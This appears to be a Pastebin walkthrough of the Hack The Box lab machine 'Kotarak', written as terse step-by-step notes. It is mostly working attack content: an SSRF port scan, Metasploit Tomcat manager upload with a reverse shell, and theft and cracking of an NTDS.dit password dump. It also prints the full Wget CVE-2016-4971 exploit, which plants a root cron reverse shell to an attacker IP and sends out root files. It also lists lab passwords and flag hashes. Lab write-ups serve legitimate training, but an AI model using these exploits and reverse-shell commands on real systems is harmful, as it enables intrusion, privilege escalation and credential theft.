Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- http://10.10.10.55:60000/url.php?path=
- put http://localhost:80
- get request in burp scan port from 1 to 1000
- reference :http://resources.infosecinstitute.com/the-ssrf-vulnerability/#gref
- http://10.10.10.55:60000/url.php?path=http://localhost:888
- u will get backup
- http://10.10.10.55:60000/url.php?path=http://localhost:888?doc=backup
- see source of it
- <user username="admin" password="3@g01PdhB!" roles="manager,manager-gui,admin-gui,manager-script"/>
- msfconsole
- use exploit/multi/http/tomcat_mgr_upload
- set HttpPassword 3@g01PdhB!
- set HttpUsername admin
- set RHOST 10.10.10.55
- set RPORT 8080
- set payload linux/x86/shell/reverse_tcp
- set LHOST 10.10.15.104
- set target 2
- run
- python -c 'import pty;pty.spawn("/bin/sh")'
- cd /home/tomcat/to_archive/pentest_data
- u will see
- total 28312
- drwxr-xr-x 2 tomcat tomcat 4096 Jul 21 13:13 .
- drwxr-xr-x 3 tomcat tomcat 4096 Jul 21 13:13 ..
- -rw-r--r— 1 tomcat tomcat 16793600 Jul 21 12:16 20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit
- -rw-r--r— 1 tomcat tomcat 12189696 Jul 21 12:16 20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin
- tomcat@kotarak-dmz:/home/tomcat/to_archive/pentest_data$
- download .dit and .bin file in your pc
- https://implicitdeny.org/2016/05/cracking-domain-passwords-ntds-dit-metasploit-john/
- crack it u will get pass
- su atanas
- f16tomcat!
- 93f844f50491ef797c9c1b601b4bece8
- for root goto /tmp
- on your pc goto /tmp file
- nano .wgetrc
- post_file = /root/root.txt
- output_document = /etc/cron.d/wget-root-shell
- https://www.exploit-db.com/exploits/40064/
- see this exploit
- nano wget-exploit.py
- #!/usr/bin/env python
- #
- # Wget 1.18 < Arbitrary File Upload Exploit
- # Dawid Golunski
- # dawid( at )legalhackers.com
- #
- # http://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt
- #
- # CVE-2016-4971
- #
- import SimpleHTTPServer
- import SocketServer
- import socket;
- class wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler):
- def do_GET(self):
- # This takes care of sending .wgetrc
- print "We have a volunteer requesting " + self.path + " by GET :)\n"
- if "Wget" not in self.headers.getheader('User-Agent'):
- print "But it's not a Wget :( \n"
- self.send_response(200)
- self.end_headers()
- self.wfile.write("Nothing to see here...")
- return
- print "Uploading .wgetrc via ftp redirect vuln. It should land in /root \n"
- self.send_response(301)
- new_path = '%s'%('ftp://anonymous@%s:%s/.wgetrc'%(FTP_HOST, FTP_PORT) )
- print "Sending redirect to %s \n"%(new_path)
- self.send_header('Location', new_path)
- self.end_headers()
- def do_POST(self):
- # In here we will receive extracted file and install a PoC cronjob
- print "We have a volunteer requesting " + self.path + " by POST :)\n"
- if "Wget" not in self.headers.getheader('User-Agent'):
- print "But it's not a Wget :( \n"
- self.send_response(200)
- self.end_headers()
- self.wfile.write("Nothing to see here...")
- return
- content_len = int(self.headers.getheader('content-length', 0))
- post_body = self.rfile.read(content_len)
- print "Received POST from wget, this should be the extracted /etc/shadow file: \n\n---[begin]---\n %s \n---[eof]---\n\n" % (post_body)
- print "Sending back a cronjob script as a thank-you for the file..."
- print "It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)"
- self.send_response(200)
- self.send_header('Content-type', 'text/plain')
- self.end_headers()
- self.wfile.write(ROOT_CRON)
- print "\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \n"
- return
- HTTP_LISTEN_IP = ''
- HTTP_LISTEN_PORT = 80
- FTP_HOST = '10.10.14.2'
- FTP_PORT = 21
- ROOT_CRON = "* * * * * root bash -i >& /dev/tcp/10.10.14.2/1234 0>&1"
- handler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)
- print "Ready? Is your FTP server running?"
- sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- result = sock.connect_ex((FTP_HOST, FTP_PORT))
- if result == 0:
- print "FTP found open on %s:%s. Let's go then\n" % (FTP_HOST, FTP_PORT)
- else:
- print "FTP is down :( Exiting."
- exit(1)
- print "Serving wget exploit on port %s...\n\n" % HTTP_LISTEN_PORT
- handler.serve_forever()
- save it change ftp ip to ur vpn ip
- than upload that file on server in /tmp file
- open new msfconsole
- use auxiliary/server/ftp
- set FTPROOT /tmp
- set LHOST your ip
- run
- than goto server
- after u upload
- authbind python wget-exploit.py
- 950d1425795dfd38272c93ccbb63ae2c
Add Comment
Please, Sign In to add comment